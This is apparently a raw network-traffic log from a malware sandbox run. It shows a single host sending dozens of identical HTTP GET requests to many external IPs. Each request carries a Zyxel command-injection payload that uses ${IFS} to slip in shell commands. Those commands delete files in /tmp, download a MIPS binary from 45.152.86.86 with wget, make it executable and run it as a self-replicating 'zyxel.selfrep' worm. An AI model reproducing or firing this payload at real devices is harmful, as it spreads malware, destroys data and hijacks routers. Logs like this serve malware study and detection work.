                                        Mar 31, 2024 09:22:14.542979956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7486192.168.2.2357346184.109.224.13443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.543030024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7487192.168.2.235740474.111.144.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.543071985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7488192.168.2.235523880.132.59.109443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.543112040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7489192.168.2.2335630169.45.225.181443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.543160915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7490192.168.2.2342510140.112.53.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.543184042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7491192.168.2.234529454.86.196.173443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.543225050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7492192.168.2.234034473.247.154.103443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.543251991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7493192.168.2.2335212119.114.62.218443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.543292999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7494192.168.2.2336114110.145.236.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.543333054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7495192.168.2.2345442212.31.178.203443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.543387890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7496192.168.2.2342472165.191.254.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.543428898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7497192.168.2.2339848162.134.93.86443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.543469906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7498192.168.2.235508871.96.158.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.543519020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7499192.168.2.2360672101.162.93.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.543554068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7500192.168.2.234390497.196.63.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.543596029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7501192.168.2.234992618.35.41.47443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.543644905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7502192.168.2.2336894111.228.95.227443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.543685913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7503192.168.2.233520641.239.196.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.543725967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7504192.168.2.2337148156.126.32.209443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.543761969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7505192.168.2.2357468168.142.96.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.543807983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7506192.168.2.234269278.138.19.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.543848038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7507192.168.2.2342936120.109.80.202443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.543894053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7508192.168.2.2357888106.237.7.95443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.543931961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7509192.168.2.23505385.38.201.80443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.543963909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7510192.168.2.2333514213.112.225.191443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.543994904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7511192.168.2.234721699.97.28.228443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.544037104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7512192.168.2.236035225.72.213.68443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.544070959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7513192.168.2.2338944211.64.77.107443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.544140100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7514192.168.2.2337668181.142.136.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.544177055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7515192.168.2.234862868.200.120.210443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.544229984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7516192.168.2.2345784192.125.133.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.544258118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7517192.168.2.235446249.125.243.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.544302940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7518192.168.2.2347840126.25.187.118443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.544328928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7519192.168.2.2360534170.133.1.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.544375896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7520192.168.2.234425276.234.89.217443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.544414043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7521192.168.2.2337914132.150.210.242443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.544462919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7522192.168.2.2351166188.82.121.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.544506073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7523192.168.2.233927296.90.155.157443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.544553041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7524192.168.2.234932666.195.47.243443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.544586897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7525192.168.2.234456640.136.14.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.544631004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7526192.168.2.235703424.70.89.192443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.544675112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7527192.168.2.2354840223.100.127.99443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.544694901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7528192.168.2.234014269.126.70.116443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.544739962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7529192.168.2.234585696.192.35.255443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.550328016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7530192.168.2.2338424113.2.243.97443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.551064014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7531192.168.2.234075851.148.143.20443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.551093102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7532192.168.2.2349676111.141.102.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.551141977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7533192.168.2.2333634112.64.248.254443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.551171064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7534192.168.2.235450692.48.254.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.551194906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7535192.168.2.235822242.70.56.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.551224947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7536192.168.2.2344344165.19.248.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.551285982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7537192.168.2.23379604.108.173.29443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.551330090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7538192.168.2.2349200123.174.116.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.551378965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7539192.168.2.2335110221.27.133.182443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.551413059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7540192.168.2.2347688129.210.33.82443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.551445961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7541192.168.2.234544657.141.108.136443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.551469088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7542192.168.2.2356038197.124.229.80443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.551505089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7543192.168.2.2351256195.214.94.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.551553011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7544192.168.2.2348792208.122.99.83443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.551590919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7545192.168.2.2358204220.120.176.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:15.539107084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7546192.168.2.2355864161.165.37.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:15.539505959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7547192.168.2.235460673.22.41.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:15.539539099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7548192.168.2.2351934165.174.161.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:15.539588928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7549192.168.2.2342228121.34.138.166443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:15.539628983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7550192.168.2.23529269.252.78.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:15.539659023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7551192.168.2.2360546161.17.20.155443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:15.539705038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7552192.168.2.233626086.42.58.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:15.539757967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7553192.168.2.2341406191.157.90.55443
                                        TimestampBytes transferredDirectionData
